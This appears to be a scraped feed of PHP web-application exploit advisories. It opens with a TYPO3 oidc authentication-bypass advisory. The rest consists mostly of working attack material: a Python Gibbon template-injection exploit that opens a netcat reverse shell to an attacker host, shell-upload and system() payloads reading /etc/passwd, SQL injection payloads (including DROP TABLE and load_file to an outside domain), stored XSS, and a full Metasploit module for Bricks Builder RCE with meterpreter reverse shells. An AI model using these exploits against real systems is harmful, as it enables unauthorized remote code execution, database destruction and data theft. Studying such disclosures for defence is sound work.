The authentication service of the extension does not verify the OpenID Connect authentication state from the user lookup chain. Instead, the authentication service authenticates every valid frontend user from the user lookup chain, where the  frontend user field “tx_oidc” is not empty.

In scenarios, where either ext:felogin is active or where `$GLOBALS['TYPO3_CONF_VARS'][‘FE’][‘checkFeUserPid’]` is disabled, an attacker can login to OpenID Connect frontend user accounts by providing a valid username and any password. 

**OpenID Connect Authentication (oidc) Typo3 extension Authentication Bypass**

Moderate severity GitHub Reviewed Published Apr 2, 2024 to the GitHub Advisory Database • Updated Apr 2, 2024

**Package**

composer causal/oidc (Composer)

**Affected versions**

< 2.1.0

**Patched versions**

2.1.0

**Description**

The authentication service of the extension does not verify the OpenID Connect authentication state from the user lookup chain. Instead, the authentication service authenticates every valid frontend user from the user lookup chain, where the frontend user field “tx\_oidc” is not empty.

In scenarios, where either ext:felogin is active or where $GLOBALS['TYPO3_CONF_VARS'][‘FE’][‘checkFeUserPid’] is disabled, an attacker can login to OpenID Connect frontend user accounts by providing a valid username and any password.

**References**

*   https://github.com/FriendsOfPHP/security-advisories/blob/master/causal/oidc/CVE-2024-30173.yaml
*   https://typo3.org/security/advisory/typo3-ext-sa-2024-002

Published to the GitHub Advisory Database

Apr 2, 2024

Reviewed

Apr 2, 2024

Last updated

Apr 2, 2024

**Severity**

Moderate

6.0

/ 10

**CVSS base metrics**

Attack vector

Network

Attack complexity

High

Privileges required

None

User interaction

None

Scope

Unchanged

Confidentiality

High

Integrity

Low

Availability

None

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N/E:F/RL:O/RC:C

**Weaknesses**

CWE-284

**CVE ID**

CVE-2024-30173

**GHSA ID**

GHSA-hhf8-f5w9-g6vh

**Source code**

xperseguers/t3ext-oidc

Checking history

See something to contribute? Suggest improvements for this vulnerability.

GHSA-hhf8-f5w9-g6vh: OpenID Connect Authentication (oidc) Typo3 extension Authentication Bypass

Gibbon version 26.0.00 suffers from a server-side template injection vulnerability that allows for remote code execution.

    # Exploit Title: Gibbon LMS has an SSTI vulnerability on the v26.0.00 version# Date: 21.01.2024# Exploit Author: SecondX.io Research Team(Islam Rzayev,Fikrat Guliev, Ali Maharramli)# Vendor Homepage: https://gibbonedu.org/# Software Link: https://github.com/GibbonEdu/core# Version: v26.0.00# Tested on: Ubuntu 22.0# CVE : CVE-2024-24724import requestsimport reimport sysdef login(target_host, target_port,email,password):    url = f'http://{target_host}:{target_port}/login.php?timeout=true'    headers = {"Content-Type": "multipart/form-data; boundary=---------------------------174475955731268836341556039466"}    data = f"-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"address\"\r\n\r\n\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"method\"\r\n\r\ndefault\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\n{email}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n{password}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"gibbonSchoolYearID\"\r\n\r\n025\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"gibboni18nID\"\r\n\r\n0002\r\n-----------------------------174475955731268836341556039466--\r\n"    r = requests.post(url, headers=headers, data=data, allow_redirects=False)    Session_Cookie = re.split(r"\s+", r.headers['Set-Cookie'])    if Session_Cookie[4] is not None and '/index.php' in str(r.headers['Location']):        print("login successful!")    return Session_Cookie[4]def rce(cookie, target_host, target_port, attacker_ip, attacker_port):    url = f'http://{target_host}:{target_port}/modules/School%20Admin/messengerSettingsProcess.php'    headers = {"Content-Type": "multipart/form-data; boundary=---------------------------67142646631840027692410521651", "Cookie": cookie}    data = f"-----------------------------67142646631840027692410521651\r\nContent-Disposition: form-data; name=\"address\"\r\n\r\n/modules/School Admin/messengerSettings.php\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition: form-data; name=\"enableHomeScreenWidget\"\r\n\r\nY\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition: form-data; name=\"signatureTemplate\"\r\n\r\n{{{{[\'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {attacker_ip} {attacker_port} >/tmp/f']|filter('system')}}}}\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition: form-data; name=\"messageBcc\"\r\n\r\n\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition: form-data; name=\"pinnedMessagesOnHome\"\r\n\r\nN\r\n-----------------------------67142646631840027692410521651--\r\n"    r = requests.post(url, headers=headers, data=data, allow_redirects=False)    if 'success0' in str(r.headers['Location']):        print("Payload uploaded successfully!")def trigger(cookie, target_host, target_port):    url = f'http://{target_host}:{target_port}/index.php?q=/modules/School%20Admin/messengerSettings.php&return=success0'    headers = {"Cookie": cookie}    print("RCE successful!")    r = requests.get(url, headers=headers, allow_redirects=False)if __name__ == '__main__':    if len(sys.argv) != 7:        print("Usage: script.py <target_host> <target_port> <attacker_ip> <attacker_port> <email> <password>")        sys.exit(1)    cookie = login(sys.argv[1], sys.argv[2],sys.argv[5],sys.argv[6])    rce(cookie, sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4])    trigger(cookie, sys.argv[1], sys.argv[2])

Gibbon 26.0.00 Server-Side Template Injection / Remote Code Execution

Soholaunch version 4.9.4 r44 suffers from a remote shell upload vulnerability.

    ## Exploit Title: Soholaunch Version : v4.9.4 r44 Remote Code Execution### Date: 2024-3-29### Exploit Author: tmrswrr### Category: Webapps### Vendor Homepage: https://livesite.com/### Version : v4.9.4 r441 ) Login with admin cred click Main Menu > File Manager > Upload New Files > Uploading test.php file Payload : <?php echo system('id); ?>2 ) After click File Manager > Images > test.php : https://127.0.0.1/Soholaunch/images/test.phpResult: uid=1000(soho) gid=1000(soho) groups=1000(soho) uid=1000(soho) gid=1000(soho) groups=1000(soho)

Soholaunch 4.9.4 r44 Shell Upload

The FoF Pretty Mail extension version 1.1.2 for Flarum suffers from a command injection vulnerability.

    Exploit Title: FoF Pretty Mail 1.1.2 Extension for Flarum Command InjectionDate: 03/28/2024Exploit Author: Chokri HammediVendor Homepage: https://flarum.org/Software Link: https://github.com/FriendsOfFlarum/pretty-mailVersion: 1.1.2Tested on: Windows XPCVE: N/ADescription:The FoF Pretty Mail extension for Flarum is vulnerable to Command Injectiondue to the unsafe handling of user input in the email template. An attackerwith administrative access can inject PHP code into the email template,leading to arbitrary command execution on the server.Steps to Reproduce:Log in as an administrator on the Flarum forum.Navigate to the FoF Pretty Mail extension settings.Edit the email default template and insert one of the following payloads atthe end of the template:<?php system('echo "Take The Rose"; id'); ?>or<?php system('echo "Take The Rose"; cat /etc/passwd'); ?>Save the changes to the email template.Trigger any action that sends an email, such as user registration orpassword reset.The recipient of the email will see the message "Take The Rose" followed bythe output of the injected command (id or cat /etc/passwd) in the emailcontent.

FoF Pretty Mail 1.1.2 Command Injection

Event Management version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Event Management - SQL Injection# Application: Event Management# Date: 19.02.2024# Bugs: SQL Injection # Exploit Author: SoSPiro# Vendor Homepage: https://github.com/PuneethReddyHC# Software Link: https://github.com/PuneethReddyHC/event-management# Version:1.0# Attack Type: Remote# Tested on: Windows 10 64 bit Wampserver # About project:helps to register an users for on events conducted in college fests with simple logic with secured way## Vulnerability Details:- **Application Name**: Event Management- **Software Link**: [Download Link](https://github.com/PuneethReddyHC/event-management)- **Vendor Homepage**: [Vendor Homepage](https://github.com/PuneethReddyHC)# Vulnerable code section:# https://github.com/PuneethReddyHC/event-management/blob/master/backend/register.php#L64<?php// ... (other code)if(empty($full_name)  || empty($email)  || empty($mobile)) {    // Error messages and actions for incomplete data} else {    if(!preg_match($name,$full_name)){        // Error messages and actions for invalid full name    }    // Additional regex checks for email and mobile format    // Verifying mobile number length    if(!(strlen($mobile) == 10)){        // Error message and action for invalid mobile number length    }    // Database insertion operation    $sql = "INSERT INTO `participants`             (`p_id`,`event_id`, `fullname`, `email`,              `mobile`,  `college`, `branch`)             VALUES (NULL,'$event_id', '$full_name',  '$email',              '$mobile', '$college', '$branch')";                if(mysqli_query($con,$sql)){        // Successful registration message        echo "register_success";        echo "<script> location.href='index.php'; </script>";        exit;    }}// ... (other code)?># Vulnerability Description:The code in register.php is vulnerable to SQL injection, allowing an attacker to manipulate the SQL query and potentially perform unauthorized actions on the database. Additionally, the code lacks proper input validation and sanitization, making it susceptible to various forms of attacks such as cross-site scripting (XSS) and potential security risks.# Proof of Concept (PoC):SQL Injection:The vulnerability can be exploited by an attacker by manipulating the input parameters. For example, the event_id parameter is directly used in the SQL query without proper validation or parameterization:An attacker can manipulate the event_id parameter in the HTTP request to inject malicious SQL code.PoC:POST /event-management-master/backend/register.php HTTP/1.1Host: localhostevent_id=1'; DROP TABLE participants; --This could result in a SQL query like:INSERT INTO `participants` (`p_id`,`event_id`, `fullname`, `email`, `mobile`,  `college`, `branch`) VALUES (NULL,'1'; DROP TABLE participants; --', 'test', 'test@gmail.com', '0555555555', 'asd', 'qwe')To mitigate this, use prepared statements or parameterized queries to ensure proper sanitization of user inputs.

Event Management 1.0 SQL Injection

FusionPBX suffers from a session fixation vulnerability.

*Vulnerability Name - *Application is Vulnerable to Session Fixation

*Vulnerable URL: *www.fusionpbx.com

*Overview of the Vulnerability*  
Session fixation is a security vulnerability that occurs when an attacker  
sets or fixes a user's session identifier, manipulating the authentication  
process. Typically exploited in web applications, this vulnerability allows  
the attacker to force a user's session ID to a known value, granting  
unauthorized access. Attackers can initiate the attack by tricking users  
into using a provided session ID or by planting a session ID through  
various means.

*Steps to Reproduce*  
Step 1: To reproduce this vulnerability open two browsers. Copy "PHPSESSID"  
cookie from Browser 1 and paste it to Browser 2.  
Step 2: Login in Browser 1 using valid credentials.  
Step 3: Navigate to Browser 2 and refresh the page or open this URL (  
https://www.fusionpbx.com/app/account/home.php)  
Step 4: Successfully logged in Browser 2 without entering the credentials.

*Impact of Vulnerability:*  
Anyone can easily hijack victims or user's sessions and get into his account  
. Cookie stealing is the best way the hacker can get into account.. it  
would not take more than 5 min to steal someone's cookie using PHP and all  
.....  
Even friends can fool the victim and get him hacked...

*Mitigation:*Manage sessions properly. This problem is mainly faced because  
the session doesn't get expired or doesn't get closed when logout is  
pressed. Each time the user logins the cookie must hold a unique different  
session-id to proceed.

------------------------------------------------------------------------------------------------------

*FusionPBX Development Team Implemented Fix GitHub Commit Links:*  
https://github.com/fusionpbx/fusionpbx/commit/50220d7a0674fae944a1e16fab7a8517cdc51a9e  
https://github.com/fusionpbx/fusionpbx/commit/560a51cff710df12c863de53c4c8289e1516dae8

FusionPBX Session Fixation

Purei CMS version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Purei CMS 1.0 - SQL Injection# Date: [27-03-2024]# Exploit Author: [Number 7]# Vendor Homepage: [purei.com]# Version: [1.0]# Tested on: [Linux]____________________________________________________________________________________Introduction:An SQL injection vulnerability permits attackers to modify backend SQL statements through manipulation of user input. Such an injection transpires when web applications accept user input directly inserted into an SQL statement without effectively filtering out hazardous characters.This could jeopardize the integrity of your database or reveal sensitive information.____________________________________________________________________________________Time-Based Blind SQL Injection:Vulnerable files:http://localhost/includes/getAllParks.phphttp://localhost/includes/getSearchMap.phpmake a POST request with the value of the am input set to :    if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/ make sure to url encode the inputs.  SQL injection:Method: POST REQUESTVunerable file:/includes/events-ajax.php?action=getMonthdata for the POST req:month=3&type=&year=2024&cal_id=1[Inject Here]

Purei CMS 1.0 SQL Injection

Workout Journal App version 1.0 suffers from a persistent cross site scripting vulnerability.

# Exploit Title: Workout Journal App 1.0 - Stored XSS# Date: 12.01.2024# Exploit Author: MURAT CAGRI ALIS# Vendor Homepage: https://www.sourcecodester.com<https://www.sourcecodester.com/php/17088/workout-journal-app-using-php-and-mysql-source-code.html># Software Link: https://www.sourcecodester.com/php/17088/workout-journal-app-using-php-and-mysql-source-code.html# Version: 1.0# Tested on: Windows / MacOS / Linux# CVE : CVE-2024-24050# DescriptionInstall and run the source code of the application on localhost. Register from the registration page at the url workout-journal/index.php. When registering, stored XSS payloads can be entered for the First and Last name on the page. When registering on this page, for the first_name parameter in the request to the /workout-journal/endpoint/add-user.php urlFor the last_name parameter, type " <script>console.log(document.cookie)</script> " and " <script>console.log(1337) </script> ". Then when you log in you will be redirected to /workout-journal/home.php. When you open the console here, you can see that Stored XSS is working. You can also see from the source code of the page that the payloads are working correctly. This vulnerability occurs when a user enters data without validation and then the browser is allowed to execute this code.# PoCRegister Request to /workout-journal/endpoints/add-user.phpPOST /workout-journal/endpoint/add-user.php HTTP/1.1Host: localhostContent-Length: 268Cache-Control: max-age=0sec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/workout-journal/index.phpAccept-Encoding: gzip, deflate, brAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7Cookie: PHPSESSID=64s63vgqlnltujsrj64c5o0vciConnection: closefirst_name=%3Cscript%3Econsole.log%28document.cookie%29%3C%2Fscript%3E%29&last_name=%3Cscript%3Econsole.log%281337%29%3C%2Fscript%3E%29&weight=85&height=190&birthday=1991-11-20&contact_number=1234567890&email=test%40mail.mail&username=testusername&password=Test123456-This request turn back 200 Code on ResponseHTTP/1.1 200 OKDate: Sat, 16 Mar 2024 02:05:52 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.4X-Powered-By: PHP/8.1.4Content-Length: 214Connection: closeContent-Type: text/html; charset=UTF-8                <script>                    alert('Account Registered Successfully!');                    window.location.href = 'http://localhost/workout-journal/';                </script>After these all, you can go to login page and login to system with username and password. After that you can see that on console payloads had worked right./workout-journal/home.php RequestGET /workout-journal/home.php HTTP/1.1Host: localhostsec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: http://localhost/workout-journal/endpoint/login.phpAccept-Encoding: gzip, deflate, brAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7Cookie: PHPSESSID=co1vmea8hr1nctjvmid87fa7d1Connection: close/workout-journal/home.php ResponseHTTP/1.1 200 OKDate: Sat, 16 Mar 2024 02:07:56 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.4X-Powered-By: PHP/8.1.4Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Length: 2791Connection: closeContent-Type: text/html; charset=UTF-8    <!DOCTYPE html>    <html lang="en">    <head>        <meta charset="UTF-8">        <meta name="viewport" content="width=device-width, initial-scale=1.0">        <title>Workout Journal App</title>                <link rel="stylesheet" href="./assets/style.css">                <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.2/dist/css/bootstrap.min.css">        <style>            body {                overflow: hidden;            }        </style>    </head>    <body>        <div class="main">            <nav class="navbar navbar-expand-lg navbar-dark bg-dark">                <a class="navbar-brand ml-3" href="#">Workout Journal App</a>                <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">                    <span class="navbar-toggler-icon"></span>                </button>                <div class="collapse navbar-collapse" id="navbarSupportedContent">                    <ul class="navbar-nav ml-auto">                    <li class="nav-item active">                        <a class="nav-link" href="./endpoint/logout.php">Log Out</a>                    </li>                </div>            </nav>            <div class="landing-page-container">                <div class="heading-container">                    <h2>Welcome <script>console.log(document.cookie);</script>) <script>console.log(1337);</script>)</h2>                    <p>What would you like to do today?</p>                </div>                <div class="select-option">                    <div class="read-journal" onclick="redirectToReadJournal()">                        <img src="./assets/read.jpg" alt="">                        <p>Read your past workout journals.</p>                    </div>                    <div class="write-journal" onclick="redirectToWriteJournal()">                        <img src="./assets/write.jpg" alt="">                        <p>Write your todays journal.</p>                    </div>                </div>            </div>        </div>                <script src="https://cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.slim.min.js"></script>        <script src="https://cdn.jsdelivr.net/npm/popper.js@1.16.1/dist/umd/popper.min.js"></script>        <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.2/dist/js/bootstrap.min.js"></script>                <script src="./assets/script.js"></script>    </body>    </html>

Workout Journal App 1.0 Cross Site Scripting

LMS PHP version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: LMS-PHP-byoretnom23-v1.0 Multiple-SQLi## Author: nu11secur1ty## Date: 03/28/2024## Vendor: https://github.com/oretnom23## Software: https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html#comment-104400## Reference: https://portswigger.net/web-security/sql-injection## Description:The id parameter appears to be vulnerable to SQL injection attacks.The payload '+(selectload_file('\\\\95ctkydmc3d4ykhxxtph7p6xgomiagy71vsij68.tupgus.com\\mpk'))+'was submitted in the id parameter. This payload injects a SQLsub-query that calls MySQL's load_file function with a UNC file paththat references a URL on an external domain. The applicationinteracted with that domain, indicating that the injected SQL querywas executed. The attacker can get all information from the system byusing this vulnerability!STATUS: HIGH- Vulnerability[+]Payload:```mysql---Parameter: id (GET)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BYor GROUP BY clause    Payload: page=user/manage_user&id=7''' RLIKE (SELECT (CASE WHEN(2375=2375) THEN 0x372727 ELSE 0x28 END)) AND 'fkKl'='fkKl    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: page=user/manage_user&id=7''' AND (SELECT 1734FROM(SELECT COUNT(*),CONCAT(0x716a707071,(SELECT(ELT(1734=1734,1))),0x71717a7871,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'CYrv'='CYrv    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: page=user/manage_user&id=7''' AND (SELECT 6760 FROM(SELECT(SLEEP(7)))iMBe) AND 'xzwU'='xzwU    Type: UNION query    Title: MySQL UNION query (NULL) - 11 columns    Payload: page=user/manage_user&id=-2854' UNION ALL SELECTNULL,NULL,NULL,NULL,CONCAT(0x716a707071,0x6675797766656155594373736b724a5a6875526f6f65684562486c48664e4d624f75766b4a444b43,0x71717a7871),NULL,NULL,NULL,NULL,NULL,NULL#---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2024/LMS-PHP-byoretnom23-v1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/03/lms-php-byoretnom23-v10-multiple-sqli.html)## Time spent:01:15:00

LMS PHP 1.0 SQL Injection

This Metasploit module exploits an unauthenticated remote code execution vulnerability in the Bricks Builder Theme versions 1.9.6 and below for WordPress. The vulnerability allows attackers to execute arbitrary PHP code by leveraging a nonce leakage to bypass authentication and exploit the eval() function usage within the theme. Successful exploitation allows for full control of the affected WordPress site. It is recommended to upgrade to version 1.9.6.1 or higher.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Remote::HTTP::Wordpress  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Unauthenticated RCE in Bricks Builder Theme',        'Description' => %q{          This module exploits an unauthenticated remote code execution vulnerability in the          Bricks Builder Theme versions <= 1.9.6 for WordPress. The vulnerability allows attackers          to execute arbitrary PHP code by leveraging a nonce leakage to bypass authentication and          exploit the eval() function usage within the theme. Successful exploitation allows for full          control of the affected WordPress site. It is recommended to upgrade to version 1.9.6.1 or higher.        },        'Author' => [          'Calvin Alkan', # Vulnerability discovery          'Valentin Lobstein' # Metasploit module        ],        'License' => MSF_LICENSE,        'References' => [          ['CVE', '2024-25600'],          ['URL', 'https://github.com/Chocapikk/CVE-2024-25600'],          ['URL', 'https://snicco.io/vulnerability-disclosure/bricks/unauthenticated-rce-in-bricks-1-9-6'],          ['WPVDB', 'afea4f8c-4d45-4cc0-8eb7-6fa6748158bd']        ],        'DisclosureDate' => '2024-02-19',        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'SideEffects' => [ IOC_IN_LOGS ],          'Reliability' => [ REPEATABLE_SESSION ]        },        'Platform' => ['unix', 'linux', 'win', 'php'],        'Arch' => [ARCH_PHP, ARCH_CMD],        'Targets' => [          [            'PHP In-Memory',            {              'Platform' => 'php',              'Arch' => ARCH_PHP,              'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' },              'Type' => :php_memory            }          ],          [            'Unix In-Memory',            {              'Platform' => ['unix', 'linux'],              'Arch' => ARCH_CMD,              'DefaultOptions' => { 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter/reverse_tcp' },              'Type' => :unix_memory            }          ],          [            'Windows In-Memory',            {              'Platform' => 'win',              'Arch' => ARCH_CMD,              'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp' },              'Type' => :win_memory            }          ],        ],        'Privileged' => false      )    )  end  def fetch_nonce    uri = normalize_uri(target_uri.path)    res = send_request_cgi('method' => 'GET', 'uri' => uri)    return nil unless res&.code == 200    script_tag_match = res.body.match(%r{<script id="bricks-scripts-js-extra"[^>]*>([\s\S]*?)</script>})    return nil unless script_tag_match    script_content = script_tag_match[1]    nonce_match = script_content.match(/"nonce":"([a-f0-9]+)"/)    nonce_match ? nonce_match[1] : nil  end  def exploit    nonce = fetch_nonce    fail_with(Failure::NoAccess, 'Failed to retrieve nonce. Exiting...') unless nonce    print_good("Nonce retrieved: #{nonce}")    send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'index.php'),      'ctype' => 'application/json',      'data' => {        'postId' => rand(1..10000).to_s,        'nonce' => nonce,        'element' => {          'name' => 'code',          'settings' => {            'executeCode' => 'true',            'code' => "<?php #{payload_instance.arch.include?(ARCH_PHP) ? payload.encoded : "system(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'))"} ?>"          }        }      }.to_json,      'vars_get' => {        'rest_route' => '/bricks/v1/render_element'      }    )  end  def check    return CheckCode::Unknown('WordPress does not appear to be online.') unless wordpress_and_online?    wp_version = wordpress_version    print_status("WordPress Version: #{wp_version}") if wp_version    theme_check_code = check_theme_version_from_style('bricks', '1.9.6.1')    return CheckCode::Unknown('The Bricks Builder theme does not appear to be installed') unless theme_check_code    return CheckCode::Detected('The Bricks Builder theme is running but the version was unable to be determined') if theme_check_code.code == 'detected'    return CheckCode::Safe("The Bricks Builder is running version: #{theme_check_code.details[:version]}, which is not vulnerable.") unless theme_check_code.code == 'appears'    theme_version = theme_check_code.details[:version]    print_good("Detected Bricks Builder theme version: #{theme_version}")    CheckCode::Appears  endend

Tag

#php